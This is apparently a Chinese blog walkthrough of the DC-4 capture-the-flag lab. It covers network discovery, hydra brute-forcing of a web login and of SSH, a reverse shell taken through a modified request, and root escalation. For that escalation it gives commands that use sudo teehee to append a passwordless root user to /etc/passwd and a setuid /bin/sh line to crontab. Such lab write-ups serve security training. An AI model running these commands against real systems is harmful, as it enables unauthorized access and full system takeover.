DC4渗透测试过程

DC4渗透测试

*测试范围*

*序号**系统名称**地址**权限*
1DC1192.168.57.91普通用户

kali扫描网段

netdiscover -i eth0 -r 192.168.57.0/24

在这里插入图片描述

在这里插入图片描述

有一个登录界面

爆破用户密码

用yakit爆破

在这里插入图片描述

爆破到密码为happy

在这里插入图片描述

登录发现可以执行命令

在这里插入图片描述

也可以用hydra爆破

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz 192.168.165.91 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

抓包修改命令反弹shell

kali监听

在这里插入图片描述

在这里插入图片描述

拿到了权限www-data

在这里插入图片描述

提权

cat /etc/passwd | grep '/bin/bash'

在这里插入图片描述

三个有root权限的用户

查看三个用户目录发现jim有个密码字典

在这里插入图片描述

有个mbox文件只有jim可以读

在这里插入图片描述

通过得到的字典爆破ssh

hydra -l jim -P out.txt -t 10 -vV -e ns -o save.log 192.168.57.91 ssh

在这里插入图片描述

得到了jim的密码

ssh连接

在这里插入图片描述

查看mbox,是邮件

在这里插入图片描述

mail命令得到了charles 的密码

在这里插入图片描述

在这里插入图片描述

切换登录charles

在这里插入图片描述

sudo -l 发现teehee命令可以直接sudo

在这里插入图片描述

teehee 可以将标准输入复制到我们选择的文件中。那么我可以直接写一个 root 权限的用户到 /etc/passwd 下,也可以直接在 sudoers 里给 charles 所有权限

直接加个用户到/etc/passwd

echo "root2::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

在这里插入图片描述

提权成功

也可以定时任务

echo "****root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

获得flag

在这里插入图片描述

echo “****root chmod 4777 /bin/sh” | sudo teehee -a /etc/crontab


获得flag

[外链图片转存中...(img-c4eA37Ji-1719230764034)]

  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值